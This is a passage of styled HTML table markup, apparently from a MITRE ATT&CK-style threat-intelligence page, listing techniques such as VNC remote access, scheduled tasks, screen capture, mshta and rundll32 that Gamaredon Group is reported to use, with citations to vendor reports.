124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1057"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1057</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1057"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Process Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used tools to enumerate processes on target hosts including Process Explorer.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1021</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Remote Services</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1021/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">VNC</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1053</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task/Job</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has created scheduled tasks to launch executables after a designated number of minutes have passed.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1113</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen Capture</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">'s malware can take screenshots of the compromised computer every minute.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1608</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Stage Capabilities</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1608/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Upload Malware</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has registered domains to stage payloads.</span><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1218</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Mshta</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">mshta.exe</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to execute malicious HTA files.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.011</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Rundll32</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware has used rundll32 to launch additional malicious components.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1082"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1082</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1082"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: 